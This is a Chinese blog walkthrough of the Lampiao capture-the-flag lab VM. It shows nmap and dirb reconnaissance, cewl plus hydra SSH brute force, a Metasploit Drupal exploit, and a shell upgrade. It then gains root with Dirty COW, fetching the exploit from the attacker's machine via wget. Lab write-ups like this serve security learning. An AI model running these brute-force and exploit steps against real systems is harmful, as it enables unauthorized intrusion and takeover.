Lampiao零基础渗透测试

Lampiao靶机:链接:https://pan.baidu.com/s/1F2Yf7SsryDGdDgxSEVC6EQ?pwd=uwuk 
提取码:uwuk 

kali:ip地址192.168.182.130

靶机:ip地址192.168.182.131

靶机与kali都为NAT模式

1.确定目标

 nmap -sP ip/24 :扫描这个网段存活的主机IP

 分析:扫出了5个IP,但是1,2,254三个地址是自带的,130地址为kali地址,那么131地址就是靶机地址

2.信息收集

nmap -p- ip :扫描这个IP开放的的端口

可以看到,靶机开放了22,80,1898端口,百度查询各个端口作用:

22:默认是用于LInux主机的SSH远程服务应用的端口号,用于通过命令行模式远程连接系统服务器

80:80是http协议的默认端口

首先试着访问80端口,发现什么都没有

 接下来访问1898端口

 出现了一个页面,猜测其中有需要的信息,想到以下方法:

发现有输入输出框:sql注入,爆破,XSS

目录遍历:寻找敏感文件

查看源代码,发现找不到线索

点击图片

看到这个地址:http://192.168.182.131:1898/?q=node/1

 试着把1改成2

发现两个目录,试着访问一下

 

 录音是:user tiago ,看来找到用户名了

另一个文件是一个二维码,扫一下是 try harder,mahahaha,估计是要暴力破解

dirb http://192.168.182.131:1898/

使用kali自带的dirb工具进行扫描开始扫描

可以看到robots.txt文件,robots.txt是一个协议,而不是一个命令。robots.txt是搜索引擎中访问网站的时候要查看的第一个文件。robots.txt文件告诉蜘蛛程序在服务器上什么文件是可以被查看的。这个文件通常包括我们需要的信息

访问robots.txt,直接看到Disallow,不允许查看的文件

 先查看第一个/CHANGELOG.txt,发现一个版本信息,这样,信息收集就算完成了

3.发现漏洞

(我的步骤都是在桌面打开终端)

既然已经获取了账号名,可以尝试暴力破解

cewl http://192.168.182.131:1898/ -w yc.txt

cewl是一个字典生成工具,使用cewl爬取网站信息生成字典,然后再把字典保存在yc.txt中

 使用hydra进行爆破,命令为

hydra -l tiago -P yc.txt 192.168.182.131 ssh

 

ssh user@IP 

上面的是第一种思路,通过已知账号名使用 cvwl,hydra等工具进行爆破,获得账号密码后使用ssh来登录

4.漏洞利用

 第二种思路,前面信息收集获取了CMS版本号,可以通过查询这个版本的历史漏洞来尝试进行攻击

可见,靶机是有这个漏洞的

开始使用kali的一个非常强大的工具msfconsole

 

通过search Drupal来找到EXP(exploit),利用的意思

通过这个漏洞是2018年爆出的,所以选择use 1

 show options命令查看需要输入的函数,required为yes的需要查看

rhost设置靶机的ip地址,rport端口改为1898,因为我们是通过这个端口进行攻击的

 

 run命令开始运行

我们此时拿到的是一个伪终端,我们前面拿到的那种才是真终端,现在需要把伪终端变为真终端

输入shell

输入python -c 'import pty;pty.spawn("/bin/bash")'

 5.权限提升

这个时候你发现你的用户名有一个$符,这个权限是最低的,当你输入id时显示id=1000,因此我们需要提权

uname -a查看版本信息,找到可以利用的提权方法

版本符合,可以使用 

桌面新建一个终端

kali收录了这个提取方法的exp,我们把他下载下来存放在kali,再通过http服务,用已经拿到的靶机权限把exp下载到靶机运行

searchsploit dirty

searchsploit -p linux/local/0847.cpp查看这个exp的绝对路径,也可以

使用locate  linux/local/0847.cpp

cp /usr/share/exploitdb/exploits/linux/local/40847.cpp  /home/kali/Desktop/
把这个文件放到桌面

 8083是可代理网页与下载文件端口,是一种逻辑端口

python3 -m http.server 8083

 

wget http://192.168.182.130:8083/40847.cpp

 编译cpp文件

 g++ -Wall -pedantic -O2 -std=c++11 -pthread -o yc 40847.cpp -lutil

./yc 执行exp

拿到root账号密码,直接登录

su root

 找到root路径,cat flag.txt拿到flag

 

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
lampiao是一个用于渗透测试的靶机,通过对其进行渗透测试可以提高我们对主机渗透的理解和技能。渗透测试是一种以模拟真实攻击方式来评估系统安全性的方法。在进行渗透测试时,我们需要准备好lampiao靶机的环境,你可以从https://download.vulnhub.com/lampiao/Lampiao.zip下载并安装lampiao靶机。在渗透测试过程中,我们可以通过对网站目录的扫描来发现存在的网页,然后尝试寻找有用的信息。有时开发人员会将测试用的账户密码注释在配置文件中,但在这个例子中并未找到。然而,我们可以找到apache的版本号和操作系统等指纹信息。根据这些信息,我们可以搜索对应版本存在的漏洞,并利用这些漏洞进行入侵。渗透测试的目的是帮助我们发现系统中的漏洞和安全弱点,并提出相应的解决方案来加强系统的安全性。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [lampiao靶机渗透测试](https://blog.csdn.net/m0_56375711/article/details/128434954)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* [vulhub渗透测试靶机学习1](https://download.csdn.net/download/weixin_35804557/86347525)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值